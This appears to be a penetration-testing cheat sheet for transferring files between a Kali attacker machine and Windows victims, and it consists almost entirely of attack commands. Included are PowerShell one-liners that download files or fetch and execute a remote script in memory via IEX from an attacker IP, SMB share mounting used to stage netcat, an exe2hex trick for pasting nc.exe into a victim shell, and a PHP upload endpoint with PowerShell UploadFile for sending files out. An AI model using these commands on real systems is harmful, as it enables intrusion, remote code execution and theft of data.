Skip to main content

Transferring Files with Windows Hosts

  • PowerShell one-liner download

powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<KALI IP>/<FILE>', '<FILE>')"

iwr -uri http://<KALI IP>/<FILE> -Outfile <FILE>

  • Run a powershell script without downloading it

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/<SCRIPT>.ps1')

Uploading Files with SMB

  • Start an smb server on kali

impacket-smbserver <share name> <forder>
#ex. impacket-smbserver robogroot .

  • Mount Share on windows

net use * \\<KALI IP>\<SHARE NAME>
#ex. net use * \\\robogroot

  • Copy files to windows

copy Z:\<file>
#ex. copy Z:\nc.exe

Windows Downloads with exe2hex and PowerShell

  • Inside Kali run :

upx -9 nc.exe

exe2hex -x nc.exe -p nc.cmd

Paste the output of nc.cmd inside windows victim machine

Windows Uploads Using Powershell

  • Step 1 : Create upload.php inside /var/www/html

<?php $uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>

sudo mkdir /var/www/uploads

sudo chown www-data: /var/www/uploads

sudo systemctl restart apache2

  • Step 2: Post the file from Windows

powershell -c "(New-Object System.Net.WebClient).UploadFile('http://<KALI IP>/upload.php', 'FILE')"